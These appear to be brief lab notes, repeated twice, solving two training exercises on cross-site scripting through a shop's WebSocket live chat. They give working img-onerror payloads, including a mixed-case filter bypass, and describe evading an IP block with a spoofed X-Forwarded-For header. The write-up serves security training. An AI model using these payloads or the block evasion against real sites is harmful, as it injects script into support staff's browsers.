labs

This online shop has a live chat feature implemented using WebSockets. Chat messages that you submit are viewed by a support agent in real time. To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.
use Burp Repeter, and send to server

{ "message": "<img src=x onerror='alert(1)'/>" }

This online shop has a live chat feature implemented using WebSockets.It has an aggressive but flawed XSS filter.To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.
try with payload <img src=1 onerror=alert(1)> and chat was disconnect
try to reconnect but cannot connect
add X-Forwarded-For header with new IP address and can connect
solution payload

<img src=1 oNeRrOr=alert`1`>

Last updated 2 years ago

This online shop has a live chat feature implemented using WebSockets. Chat messages that you submit are viewed by a support agent in real time. To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.
use Burp Repeter, and send to server

{ "message": "<img src=x onerror='alert(1)'/>" }

This online shop has a live chat feature implemented using WebSockets.It has an aggressive but flawed XSS filter.To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.
try with payload <img src=1 onerror=alert(1)> and chat was disconnect
try to reconnect but cannot connect
add X-Forwarded-For header with new IP address and can connect
solution payload

<img src=1 oNeRrOr=alert`1`>

Last updated 2 years ago